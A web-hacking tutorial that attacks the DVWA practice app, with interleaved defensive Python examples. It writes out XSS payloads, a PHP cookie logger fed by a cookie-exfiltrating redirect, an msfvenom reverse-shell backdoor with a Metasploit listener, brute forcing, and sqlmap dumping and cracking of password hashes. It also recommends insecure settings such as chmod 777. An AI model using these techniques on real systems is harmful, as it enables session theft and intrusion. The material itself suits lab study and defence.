Web Hacking

Cyber Security Simplified

Setting up DVWA and Configuring database and user

So, we will now install and configure DVWA. To do so, download the DVWA zip file from www.dvwa.co.uk.

After downloading, unzip the file on the desktop or any desired folder and rename the extracted folder to any desired name, like dvwa.

After that open your terminal. You can see that I am logged in as a non-root user, so first log in as root.

Type su in the terminal, enter the password and you will be logged in as the root user.

Now we will move the folder from the desktop to /var/www/html using the move command:

mv /home/sagar/Desktop/dvwa /var/www/html

The folder will be moved to the destination directory. Now we will use the chmod command to change the permissions of that folder. We will use 777 for this:

chmod 777 /var/www/html/dvwa

Now, as root, type service apache2 start to start the Apache server, and then service mysql start to start the MySQL service. To check this, open your browser and type localhost; you will see the default Apache page.

After that we will configure the database for DVWA. Open your terminal with root permissions and type mysql, which opens a MariaDB prompt. Now create a database with the name mydata, as shown in the image below:

After that we have to create a user for it. To do so type CREATE USER 'myuser'@'127.0.0.1' IDENTIFIED BY 'mypass';

After that we will grant all privileges on the database to this user. To do so type grant all on mydata.* to 'myuser'@'127.0.0.1';

After that we flush the privileges by typing flush privileges. Now everything is configured on the MySQL side and we will make the changes in the DVWA config file. Open the config file from the terminal or by opening it manually, and fill in the information as in the image below:

Save that file and then go to localhost/dvwa/setup.php. Now everything is done with MySQL, but there are some problems with DVWA, so we will fix them next.

Fixing issues In DVWA

After installing DVWA we will fix some issues we encountered.

We have to edit the php.ini file to fix these issues: allow_url_include is turned off, and a missing PHP module known as GD has to be installed.

Let's start fixing these issues. To do so, we will first start the mysql and apache2 services.

After taking root permission, type service apache2 start && service mysql start in the terminal.

After that, clear the screen. Now navigate to /etc/php/7.0, where we have to edit the php.ini file. We will open it in leafpad by typing leafpad php.ini

Then search for the string allow_url_include in that file. After finding it you can see that this flag is set to Off.

Edit this and type On instead of Off. After that we have to install php-gd. To install it, open your terminal with superuser permissions and type apt-get install php-gd

You will get an error because the Apache server is using the directory. Turn the apache and mysql services off and run the same command again. Now it will start installing the package.

It will ask you some basic questions, such as whether you want to modify the php.ini file; choose to keep the local version currently installed and the package will be installed successfully. Then restart the apache and mysql services, open your browser and visit localhost/dvwa/setup.php

Now everything is installed and DVWA is able to run properly. Next we will set up reCAPTCHA. To get reCAPTCHA keys go to https://www.google.com/recaptcha/intro/android.html where you will see a button which says Get reCAPTCHA.

Log in with your Google account; it will then ask for some basic information like a label, the type of reCAPTCHA, etc.

Then it will provide a site key and a secret key. Now open the DVWA configuration file by typing leafpad /var/www/html/dvwa/config/config.inc.php. You can see two fields in this file for the public key and the private key; copy the keys and paste them there.

Now the setup is complete and you can use admin/password to log in.

Configuring burp with browser

Here we will understand how to set up Burp Suite for penetration testing. For this you need to configure Burp Suite with your internet browser, and to intercept HTTPS traffic between the browser and websites you need to install Burp's CA certificate. So let's configure it with your browser:

-> First open up Burp Suite. Go to Proxy -> Options.

-> Here you will see the proxy listener. The proxy interface is shown as 127.0.0.1:8080, i.e. the proxy address is 127.0.0.1 and the port is 8080. You can see that it is running.

Now in your browser's settings scroll down to Network Proxy and click on the Settings button.

Now you need to configure the manual proxy. In the HTTP proxy field write 127.0.0.1 and in the port field type 8080. Click on OK.

-> Now you can visit any website, but to browse websites that use HTTPS you need to install the CA certificate in your browser.

-> To install the CA certificate in your browser, type the URL http://burp and press enter. Now click on CA Certificate.

On the pop-up press OK and the file is downloaded. Open this downloaded file; on the next pop-up click on Install Certificate.

Now click on Next -> Next -> Finish and the certificate is installed. Now you can intercept all the traffic between your browser and Burp.

-> Now let's check if Burp Suite is set up properly. In your browser type google.com. Now go to Burp Suite and click on Proxy -> Intercept. Here you will see that intercept is off.

Turn intercept on by clicking the Intercept is off button. Now the intercept is on. Go to your browser and you will see the page loading; now go to Burp Suite and you will see the traffic there.

Now click on Forward. Then turn intercept off and search something on Google. Now in Burp Suite go to Proxy -> HTTP history and you can see the requests and responses there.

Various tabs (Options) in burp suite

  1. Target tab: The Target tab lists all the websites you have visited while Burp is configured as a proxy in your browser. In this tab Burp does some scanning of the websites you have visited: it shows folders and sub-folders, and it also performs some simple vulnerability scanning, for example of SSL certificates.

Don't trust all the issues you get from this simple scanning, because it produces many false positives. So it is advised that before reporting or going further you check the issues found by the simple scan manually. It also shows the whole tree of endpoints of a website.

  2. Proxy tab:

   2.1> Intercept: The Intercept tab intercepts the traffic and shows it to you in real time. To demonstrate this, let's suppose I am logging in to a Udemy account. For this I filled in the username and password, turned on intercept in Burp and clicked the login button on the Udemy website. Now forward the request by clicking the Forward button in Burp Suite. In Burp Suite you can see the whole request.

   2.2> HTTP history: This tab logs all the requests and responses throughout the session. If you have sent many requests, all of them and their responses are logged in this tab.

   2.3> WebSockets history: This will detect whether there are any WebSockets in use.

   2.4> Options: You can do a lot of things here. You can change the proxy listeners. You can import a CA certificate or generate one. You can add interception rules, e.g. intercept a request only if the rules match and otherwise let it through. You can also intercept some of the server responses and add rules there. You can add WebSocket rules. You can automatically modify requests, and you can match and replace parts of requests and responses, e.g. if the browser matches Mozilla then replace it with Chrome. There are several other options here that make your work easier.


Finishing the burp suite

4. Scanner: Let's suppose you have some website in your Target tab. The Scanner tab will then scan that website for common vulnerabilities that can be found by automated testing.

   4.1> Issue activity: In this tab you can see details of each vulnerability like time, issue type, path, insertion type etc.

   4.2> Scan queue: Here you can see the other websites you have queued for scanning.

   4.3> Live scanning: Here Burp can perform live scanning, i.e. whichever website you are visiting, it starts scanning it while you are testing the website yourself.

   4.4> Issue definitions: In this tab you can see the large number of issues defined in Burp, with their definitions, which it can find on websites.

   4.5> Options: In this tab there are various options. You can select the individual issues you want to search for on the website.

5. Intruder: Let's suppose you want to perform a brute force attack on some mobile number or OTP; you can perform that with the help of this tab.

   5.1> Target: This tab contains the website and the port it has to connect to.

   5.2> Positions: In this tab you define the positions, i.e. which field you want to brute force. To demonstrate this, let's suppose I want to brute force the OTP: select that field and click on Add. Now it is added.

   5.3> Payloads: For the field we chose in the Positions tab we can add custom payloads here, or a simple list. For example, if we want to brute force some numbers we can choose numbers.

   5.4> Options: In this tab you can set other things, like the number of threads used while performing the attack, how attack results are stored (whether to keep the requests or only the results), and many other things.

6. Repeater: Let's suppose you want to repeat a request with some modified parameters; send it to Repeater, modify the parameter there and click on Go to repeat the request.

7. Sequencer: Let's suppose a website issues session cookies like 1234. If you feed these generated cookies to Sequencer, it analyses the session IDs or cookies and shows whether they are sequential or not. Let's suppose user A has cookie 1, user B has cookie 2 and so on. Here you can see that the cookies are sequential, so an attacker can take over a session just by manipulating the value of the cookie. Before analysing you need to capture at least 500 tokens.

  8. Decoder: In this tab you can decode values like Base64, HTML or URL-encoded values just by placing them here. It can also perform encoding and some hashing.
  9. Comparer: Let's suppose there are two cookies, the first from when the user was not logged in and the second from when the user was logged in. If you want to compare both cookies to see whether they have changed, or have some minor changes, you can load them in Comparer and it will show how many digits, letters or other differences there are between the cookies. If there is no difference, the cookie has not changed.
  10. Extender: In this tab you can add third-party code to customise Burp's behaviour, like adding scanners, access auditors etc. You can download these from a GitHub repository or elsewhere and just place them here.
  11. Project options: Here you can add projects and other things like upstream proxy servers etc.
  12. User options: In this tab you can use a SOCKS proxy and many other features.
  13. Alerts: Here Burp shows various alerts like your proxy service stopped, your proxy service has started, host not connected etc.
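The Sequencer item above describes the weakness of sequential session cookies. As an added example (not code from the original post), here is a small offline check for the same property, run on two constructed sets of 500 tokens as the post recommends capturing; the thresholds are my own choice.

```python
"""Added example, not from the original post: a quick offline check for the
property Burp's Sequencer tests, whether session cookies are sequential or
otherwise predictable. Both token sets below are constructed here."""
import math
import secrets


def _as_integers(tokens):
    """Interpret every token as a number (decimal if all digits, else hex);
    returns None if some token is not numeric at all."""
    base = 10 if all(t.isdigit() for t in tokens) else 16
    try:
        return [int(t, base) for t in tokens]
    except ValueError:
        return None


def sequential_fraction(tokens):
    """Fraction of consecutive token pairs that differ by exactly 1.
    A server that just counts (cookie 1, 2, 3, ...) scores close to 1.0."""
    values = _as_integers(tokens)
    if not values or len(values) < 2:
        return 0.0
    steps = sum(1 for a, b in zip(values, values[1:]) if b - a == 1)
    return steps / (len(values) - 1)


def estimated_bits(tokens):
    """Crude entropy estimate: per character position, log2 of the number of
    distinct symbols seen in the sample. Positions that never change add 0."""
    if not tokens:
        return 0.0
    width = min(len(t) for t in tokens)
    return sum(math.log2(len({t[i] for t in tokens})) for i in range(width))


def assess(tokens, min_bits=64, max_sequential=0.5):
    """Verdict plus the two measurements it is based on."""
    seq = sequential_fraction(tokens)
    bits = estimated_bits(tokens)
    verdict = "predictable" if seq > max_sequential or bits < min_bits else "looks random"
    return {"sequential_fraction": round(seq, 3), "estimated_bits": round(bits, 1), "verdict": verdict}


# Constructed samples of 500 tokens each: a counter starting at 1234, and
# 32-hex-character random tokens of the kind a sane session handler issues.
COUNTER_COOKIES = [f"{n:06d}" for n in range(1234, 1234 + 500)]
RANDOM_COOKIES = [secrets.token_hex(16) for _ in range(500)]

if __name__ == "__main__":
    print("counter:", assess(COUNTER_COOKIES))
    print("random :", assess(RANDOM_COOKIES))
```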


CSRF on low security

CSRF, also known as cross-site request forgery, is a vulnerability in which an attacker tricks a normal user into clicking a specially crafted HTML button which performs an unintended action on behalf of the user, like changing the password, or changing information like the e-mail address, username etc. This may be exploited for full account takeover.

Now we will demonstrate how to exploit it on DVWA with low security enabled.

Open your terminal with root permissions and start your Apache and MySQL servers. Now open your browser, go to localhost/dvwa/login.php and log in with the default credentials.

After login go to DVWA Security and set it to low. Now go to the CSRF tab and you will see a page like this.

This page asks you to enter your new password and confirm it. Now we will configure Burp Suite to listen to all the requests coming from the browser; we covered configuring Burp with your browser previously.

Now enter any random password in both fields, turn intercept on in Burp and submit the request. You will see a request like this:

You can see a GET request with the fields password_new and password_conf containing the password you entered. Now there are two weaknesses:

  1. The password is sent in a GET request, which means it can be cached in the browser history and will be revealed to anyone who checks the history.
  2. There is no CSRF token on this request, which means it is vulnerable to CSRF.

Now go to the HTTP history tab in Burp, look for this request, right-click on it and click Copy URL.

Now paste this into notepad. You could create a simple HTML page with this link, but we are only going to demonstrate how it works: whenever a person visits this URL his password will be changed automatically. There is only one condition, that the person has to be authenticated on that website.

Now you can embed this into an HTML form or a simple button.
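To show what closes the two weaknesses listed above, here is an added example (not code from the original post or from DVWA): a password-change handler modelled on the DVWA CSRF page, first behaving like the low-security version (GET, no token) and then requiring POST plus a per-session anti-CSRF token. Requests and sessions are plain dicts constructed here, and the hidden field name user_token is an assumption.

```python
"""Added example, not from the original post: a password-change handler in
its vulnerable form (GET request, no token) and a hardened form (POST only,
per-session token checked in constant time). Request and session objects
are constructed dicts; the field name user_token is my choice."""
import hmac
import secrets


def issue_csrf_token(session):
    """Create a random token and bind it to the server-side session. It is
    rendered into the real form as a hidden field; a page on another origin
    cannot read it, so a forged request cannot carry a valid one."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def change_password_vulnerable(request, session):
    """Low-security behaviour: any authenticated request whose two password
    fields match changes the password, whatever page the request came from."""
    if not session.get("user"):
        return "not authenticated"
    params = request["params"]
    if params.get("password_new") != params.get("password_conf"):
        return "passwords do not match"
    session["password"] = params["password_new"]
    return "password changed"


def change_password_hardened(request, session):
    """Hardened: state changes only over POST, and the submitted token must
    match the session's token; the token is single-use."""
    if not session.get("user"):
        return "not authenticated"
    if request["method"] != "POST":
        return "method not allowed"  # a link, image or redirect can only issue GET
    params = request["params"]
    expected = session.get("csrf_token")
    supplied = str(params.get("user_token", ""))
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "invalid csrf token"
    if params.get("password_new") != params.get("password_conf"):
        return "passwords do not match"
    session["password"] = params["password_new"]
    session.pop("csrf_token")  # a replayed form submission is rejected
    return "password changed"


# Constructed scenario: the victim is logged in as DVWA's default admin user
# and is lured into opening the URL copied from Burp, exactly as in the post.
FORGED_REQUEST = {
    "method": "GET",
    "params": {"password_new": "hacked", "password_conf": "hacked", "Change": "Change"},
}


def demo():
    """Returns (vulnerable outcome, hardened outcome for the forged URL,
    hardened outcome for a genuine form submission)."""
    victim = {"user": "admin", "password": "password"}
    vuln = change_password_vulnerable(FORGED_REQUEST, dict(victim))
    hardened_forged = change_password_hardened(FORGED_REQUEST, dict(victim))

    genuine_session = dict(victim)
    token = issue_csrf_token(genuine_session)  # happens when the form is rendered
    genuine_request = {
        "method": "POST",
        "params": {"password_new": "newpw", "password_conf": "newpw", "user_token": token},
    }
    hardened_genuine = change_password_hardened(genuine_request, genuine_session)
    return vuln, hardened_forged, hardened_genuine


if __name__ == "__main__":
    print(demo())
```

Note that a SameSite=Lax session cookie would not stop this particular attack, because Lax still sends the cookie on top-level GET navigations such as the victim clicking the link; that is one more reason the handler refuses GET for state changes.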

Reflected and stored XSS or Cross site scripting on low security

XSS is a very common and powerful attack vector that occurs when user input is poorly filtered while being rendered on a web page. There is a very common rule amongst web developers: never trust users. It means a user can submit anything in a form, so if a user submits a script tag and the web application renders it without any filtering, this may cause a problem. On low security we will use a simple payload.

Reflected: in reflected XSS the payload travels in the URL and will not execute until the user clicks on a malicious link, which is sometimes not possible as the user may be aware of this type of vulnerability.

Stored: in stored XSS the user does not have to visit any specially crafted link, because in this type of XSS the payload is stored in the database itself. Let's suppose there is a forum which supports commenting: a user posts a malicious comment and all the other users visit that page as intended because they think it is secure, but they are trapped and their cookies might be stolen.

Reflected XSS

"><script>alert(1);</script>

Now go to the reflected XSS tab in DVWA and you will see a screen like this.

You can enter any name in that field and it will be rendered on the screen. Now if we put a script tag in it, that will be executed as well. But since this is reflected XSS, the payload will travel in the URL, so to target a person we have to send him a URL.

Let's enter our payload "><script>alert(123);</script> in it and see what happens. As soon as we enter the payload and click on submit, you can see an alert box pop up on your screen.

Now, to target a person you have to send this whole URL to him and trick him into clicking on it to make the attack successful.

Stored XSS

There is another tab in DVWA which has a stored XSS vulnerability. That page takes your comment as input, stores it in the database and renders it on the same page. The most important thing that makes this attack more powerful is that you don't have to trick the user into clicking a link.

You can use this vulnerability to redirect the user to a web page, but we will demonstrate only an alert pop-up in this post. So we will use our previous payload, "><script>alert(123);</script>

After posting this as a comment you can see an alert pop up. This alert will not disappear after the person closes the tab and visits the page again, because it is stored in the database: every time a user visits this page an alert box pops up.
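The fix for both the reflected and the stored case above is output encoding. As an added example (not code from the original post or from DVWA), here is the name field and the guestbook rendered the way the low-security level does it, raw, and then with HTML encoding applied at render time, using the payload from this post. The storage is a constructed in-memory list; the guestbook's 50-character limit is also enforced on the server, since a maxlength attribute only exists in the browser and can be edited away.

```python
"""Added example, not from the original post: the DVWA name field and
guestbook rendered raw (as on low security) and with HTML output encoding,
using the payload from the post. Storage is a constructed in-memory list."""
import html

MAX_MESSAGE = 50  # guestbook limit, enforced here on the server too
PAYLOAD = '"><script>alert(123);</script>'  # payload used in the post


def render_name_vulnerable(name):
    """Reflected XSS: the name parameter goes straight into the response."""
    return f"<pre>Hello {name}</pre>"


def render_name_hardened(name):
    """html.escape with quote=True also encodes quotes, so a leading ">
    cannot close an attribute and break out of the surrounding markup."""
    return f"<pre>Hello {html.escape(name, quote=True)}</pre>"


class Guestbook:
    """Stores comments verbatim after validation and encodes at render time,
    so the same stored text is safe in HTML no matter what it contains."""

    def __init__(self):
        self.entries = []

    def sign(self, name, message):
        if not name or not message:
            raise ValueError("name and message are required")
        if len(message) > MAX_MESSAGE:
            raise ValueError(f"message longer than {MAX_MESSAGE} characters")
        self.entries.append((name, message))

    def render_vulnerable(self):
        # low security: stored input is echoed unchanged on every page view
        return "".join(f"<div>Name: {n}<br />Message: {m}<br /></div>" for n, m in self.entries)

    def render_hardened(self):
        return "".join(
            f"<div>Name: {html.escape(n, quote=True)}<br />"
            f"Message: {html.escape(m, quote=True)}<br /></div>"
            for n, m in self.entries
        )


def contains_script_tag(markup):
    """Rough check used below to show which rendering is still executable."""
    return "<script" in markup.lower()


def demo():
    book = Guestbook()
    book.sign("attacker", PAYLOAD)
    return {
        "reflected_vulnerable": contains_script_tag(render_name_vulnerable(PAYLOAD)),
        "reflected_hardened": contains_script_tag(render_name_hardened(PAYLOAD)),
        "stored_vulnerable": contains_script_tag(book.render_vulnerable()),
        "stored_hardened": contains_script_tag(book.render_hardened()),
    }


if __name__ == "__main__":
    print(demo())
```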

 

Stealing cookies with XSS and DOMXSS

DOM XSS: DOM-based XSS is an XSS attack where the payload is executed as a result of modifying the DOM environment in the victim's browser used by the original client-side script, so that the client-side code runs in an unexpected manner.

So, to exploit this in DVWA, first set the security to low and then go to the XSS (DOM) tab. You will see a screen like this.

In this page you are asked to select a language. If you select a language like English or French, a new parameter named default is added to the URL with the value of the language. Now, to execute XSS we have to inject our payload into this parameter. Our payload is <script>alert("hi");</script>

If you inject this into the parameter in the URL you will get the XSS pop-up on your screen.

Stealing cookies with XSS: we can also steal cookies using XSS. One method is to use JavaScript to redirect a user to a malicious site and then steal their cookies. The code we are going to use for this is:

<?php
// Best guess at the visitor's address: proxy headers first, then REMOTE_ADDR.
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

// Appends one line per request to c.txt; the query string is where the cookie arrives.
function logData()
{
    $ipLog = "c.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_globals');   // was misspelled 'register_gobals'
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port    = $_SERVER['REMOTE_PORT'];
    $user_agent  = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    $rqst_method = $_SERVER['REQUEST_METHOD'];   // $_SERVER['METHOD'] does not exist
    $rem_host    = isset($_SERVER['REMOTE_HOST']) ? $_SERVER['REMOTE_HOST'] : '';   // only set if Apache does reverse lookups
    $referer     = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
    $date = date("l dS of F Y h:i:s A");
    $log = fopen($ipLog, "a+");

    // HTML line breaks if the log file is itself an .htm/.html page, plain newlines otherwise.
    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
    fclose($log);
}

logData();
?>

So copy the code, save it in a PHP file and put the file in the /var/www/html folder. Now create the empty file named in the PHP script, in which it is going to save the cookies, and put that file in the same folder as well.

Now we are ready to steal cookies with XSS.

Go to DVWA with low security and then to the stored XSS tab; we can reproduce this on reflected XSS as well.

The message field in the stored XSS page will only accept 50 characters, but this is a client-side limitation: right-click in the message field, click on Inspect Element and modify the maxlength from 50 to whatever you want.

Now we will inject our XSS payload into it. The payload is <script>window.location='http://localhost/steal.php?cookie='+escape(document.cookie)</script>

Enter this in the message section and click on Sign Guestbook. After that, whenever a user visits the reflected XSS tab his cookies will be saved in the c.txt file as shown in the image below:

Creating A PHP Backdoor

Here we will learn how to create a PHP backdoor that can be uploaded to a website through a file upload vulnerability.

Step 1: Open your terminal and type the command

msfvenom -p <payload> lport=<listening port> lhost=<IP address> -f <format> and press enter. Here -p stands for payload, lport is the listening port, lhost is the IP address the payload will connect back to, and -f is the format in which you want the output.

For e.g. msfvenom -p php/meterpreter/reverse_tcp lport=7777 lhost=192.168.131.129 -f raw

1.1 -> To find lhost follow these steps:

Open up your terminal and take root access using the command su, then type your password. Now use the command

    -> ifconfig and press enter.

    -> Now look for the inet address and copy the IP address written in front of it. This will be used as LHOST.

Step 2: Now you will see the PHP payload code. Copy that payload as shown in the image.

Step 3: Open any text editor and paste the copied payload code. Save this file with any name and a .php extension. In my case I'm naming it payload.php

Now you have created a payload.php file that you can upload to a website.

Step 4: Now we need to control access: you can upload that file, but how will you control everything? Remember the port (lport) that you used in step 1. Now let's suppose you have successfully uploaded the payload to the target website.

For controlling access we will use msfconsole. Follow these simple steps:

-> Open your terminal, give the command msfconsole and press enter. Now we are in the Metasploit framework.

-> Now type use multi/handler and press enter.

-> Now you need to specify the payload. For that give the command set payload <payload name> (the one you used in step 1) and press enter. In my case the payload is php/meterpreter/reverse_tcp, so I give the command set payload php/meterpreter/reverse_tcp and press enter.

-> Now you need to set up lhost and lport.

    For lport use the command set lport. As we used 7777 in step 1, give the command set lport 7777 and press enter.

    For lhost use the command set lhost. As we used 192.168.131.129 in step 1, give the command set lhost 192.168.131.129 and press enter.

    Now give the command show options and press enter. It will give the output shown in the image.

Brute forcing on low security

Brute forcing: brute forcing is trying or sending the same request with modified parameters very quickly. It means that if we know the username and have about 10 candidate passwords but are unsure which one is correct, then instead of trying them manually we automate that using Burp Suite. This whole automated process is known as brute forcing.

Now we will demonstrate that on DVWA. First open your terminal with root permissions and start the Apache and MySQL services, then open your browser, go to localhost/dvwa and log in with your credentials.

After that open Burp Suite and configure it to listen to all the requests coming from the browser by adding the localhost proxy in the browser.

Now set the security of DVWA to low.

Now go to the Brute Force tab of DVWA; you can see a form like this.

It asks for your username and password. Enter your username and any wrong password and intercept the request using Burp.

Since you entered a wrong password it will say that the password is wrong. Now go to the HTTP history tab and look for this request.

Press Ctrl+I to send this request to Intruder. After that go to the Intruder tab; there are four sub-tabs in Intruder. First go to the Target tab.

Target tab: the Target tab defines the target website on which you are going to carry out this attack.

Positions tab: in the Positions tab you define the positions in the base request where the payload will be inserted. Now the third tab:

Payloads: in this tab you add the payloads you want to insert in the base request.

Now, in the Positions tab, click the Clear button to clear all the positions.

Now select the value of the password and click on Add.

Now go to the Payloads tab and add the payloads. You can load a simple list of passwords from a text file or add your own passwords; you also have the option to brute force a range of numbers. I have loaded a file in the payload options.
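Seen from the server side, both the brute-force run above and the earlier cookie theft through steal.php leave traces in the web server's access log. As an added example (not code from the original post), here is detection logic for the two, run over constructed Apache-style log lines; the DVWA path, the time window, the threshold and the sample entries are all assumptions made for this example.

```python
"""Added example, not from the original post: access-log detection for the
cookie exfiltration via a URL parameter and the Intruder password brute
force shown against DVWA. Log lines, paths and thresholds are constructed."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SESSION_COOKIE_RE = re.compile(r"(PHPSESSID|security)=", re.I)  # DVWA's own cookie names
SCRIPT_RE = re.compile(r"<script|document\.cookie|javascript:", re.I)


def parse_line(line):
    """One Apache combined-log line to a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    event = m.groupdict()
    event["time"] = datetime.strptime(event["ts"], "%d/%b/%Y:%H:%M:%S %z")
    url = urlsplit(event["target"])
    event["path"] = url.path
    event["query"] = parse_qs(url.query)
    event["decoded_query"] = unquote(url.query)
    return event


def find_cookie_exfil(events):
    """A decoded query string carrying the app's session cookie is the exfil
    request itself; script markup in it is a reflected XSS attempt."""
    hits = []
    for e in events:
        if SESSION_COOKIE_RE.search(e["decoded_query"]):
            hits.append((e["ip"], e["path"], "session cookie in query string"))
        elif SCRIPT_RE.search(e["decoded_query"]):
            hits.append((e["ip"], e["path"], "script payload in query string"))
    return hits


def find_bruteforce(events, path="/dvwa/vulnerabilities/brute/", window_s=60, threshold=10):
    """DVWA answers a failed login with HTTP 200, so status codes are useless;
    count distinct password values per source IP inside a sliding window."""
    attempts = defaultdict(list)
    for e in events:
        if e["path"] == path and "password" in e["query"]:
            attempts[e["ip"]].append((e["time"], e["query"]["password"][0]))
    alerts = []
    for ip, tries in attempts.items():
        tries.sort()
        for i, (start, _) in enumerate(tries):
            in_window = {pw for t, pw in tries[i:] if (t - start).total_seconds() <= window_s}
            if len(in_window) >= threshold:
                alerts.append((ip, len(in_window)))
                break
    return alerts


def build_sample_log():
    """Constructed log: 12 Intruder guesses in 12 seconds, one normal page
    view, and the hit on steal.php produced by the post's payload."""
    fmt = '{ip} - - [{ts}] "GET {target} HTTP/1.1" 200 1470 "-" "Mozilla/5.0"'
    lines = [
        fmt.format(ip="192.168.131.129", ts=f"10/Oct/2023:13:55:{i:02d} +0000",
                   target=f"/dvwa/vulnerabilities/brute/?username=admin&password=guess{i}&Login=Login")
        for i in range(12)
    ]
    lines.append(fmt.format(ip="10.0.0.7", ts="10/Oct/2023:13:56:01 +0000", target="/dvwa/index.php"))
    lines.append(fmt.format(ip="10.0.0.7", ts="10/Oct/2023:13:56:02 +0000",
                            target="/steal.php?cookie=PHPSESSID%3Dabc123%3B%20security%3Dlow"))
    return lines


def analyze(lines):
    """Returns (brute-force alerts, cookie/script hits) for a list of log lines."""
    events = [e for e in map(parse_line, lines) if e]
    return find_bruteforce(events), find_cookie_exfil(events)


if __name__ == "__main__":
    print(analyze(build_sample_log()))
```

Because the login form submits over GET, every guessed password, and eventually the real one, lands in the access log; that is what makes the counter possible here and is also a good reason never to accept credentials in a query string.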

SQL Injections on low security

SQL injection is a code injection technique used to attack data-driven applications, in which SQL statements are inserted into an entry field for execution, e.g. to dump the database contents to the attacker. SQL injection must exploit a security vulnerability in the application software, for example when user input is incorrectly filtered for string literal escape characters embedded in SQL statements, or when user input is not strongly typed and is unexpectedly executed.

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

Exploiting it on DVWA on low security

Log in to DVWA and set the security to low, now go to the SQL Injection tab and you will see a page like this:

It asks for a user ID; you can enter any user ID like 1, 2, 3, 4, 5. Before entering a user ID we will configure Burp to listen to all the requests coming from the browser.

Now enter a user ID of 1, turn intercept on in Burp and click on Submit in the browser. You will see the request on the screen.

Now we will use sqlmap to exploit the SQL injection, using sqlmap's request file method.

Copy the request from the Intercept tab, paste it in leafpad and save the file on the desktop.

Now follow these steps:

  1. First we have to enumerate the databases. We will use this command: sqlmap -r /home/sagar/Desktop/l.txt --dbs

The --dbs option enumerates the databases. Press enter and you will see that it starts testing the URL.

  2. After some time it will show the available databases and log the fetched data into a file.
  3. After that we have to enumerate the tables in one of those databases. Use this command to enumerate the tables in the database mydata: sqlmap -r /home/sagar/Desktop/l.txt -D mydata --tables

Here --tables enumerates the tables in the database. Press enter and it will show you the tables in the database.

  4. Now we have to enumerate the columns in the database mydata, so we choose one of the tables to enumerate. For this we use the command sqlmap -r /home/sagar/Desktop/l.txt -D mydata -T users --columns

--columns shows you all the columns in the table users, with output like this:

  5. After that we have to fetch the data in those columns. We use this command: sqlmap -r /home/sagar/Desktop/l.txt -D mydata -T users -C password --dump
  6. Now it will start dumping the password column of the table users, and afterwards it will analyse the passwords retrieved from the database. In my case it reports that the passwords are hashes and asks whether you want to crack them with the default wordlist. If you say yes it will crack the hashes and show you the plain-text passwords.

You can also dump the whole table with a single command:

sqlmap -r /home/sagar/Desktop/l.txt -D mydata -T users --dump

You can use sqlmap to exploit blind SQL injection with the same steps described above.
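What sqlmap exploits above is a query built by string concatenation. As an added example (not code from the original post or from DVWA), here is the "User ID" lookup reproduced against an in-memory SQLite database, once in the injectable low-security form and once with a parameterised query plus type validation. The users table and its rows are constructed for this example, loosely modelled on the DVWA table named above, with placeholder password hashes.

```python
"""Added example, not from the original post: the DVWA-style user-id lookup
in its injectable form and a parameterised form, against a constructed
in-memory SQLite users table (placeholder hashes, invented names)."""
import sqlite3

SAMPLE_USERS = [  # constructed rows: user_id, first_name, last_name, user, password
    (1, "Admin", "User", "admin", "hash-placeholder-1"),
    (2, "Alice", "Example", "alice", "hash-placeholder-2"),
    (3, "Bob", "Example", "bob", "hash-placeholder-3"),
    (4, "Carol", "Example", "carol", "hash-placeholder-4"),
    (5, "Dave", "Example", "dave", "hash-placeholder-5"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Low security: the raw parameter is spliced into the statement, so a
    quote in the input changes the structure of the query."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, user_id):
    """Validate the type the page expects (a number), then bind the value;
    the driver keeps data and SQL apart whatever the string contains."""
    if not isinstance(user_id, str) or not user_id.isdigit():
        raise ValueError("user id must be a positive integer")
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (int(user_id),)
    ).fetchall()


def demo():
    """Row counts for a normal id and for a tautology, under both lookups."""
    conn = make_db()
    injected = "1' OR '1'='1"  # the simplest of the variations sqlmap tries automatically
    results = {
        "vulnerable_normal": len(lookup_vulnerable(conn, "1")),
        "vulnerable_injected": len(lookup_vulnerable(conn, injected)),
        "hardened_normal": len(lookup_hardened(conn, "1")),
    }
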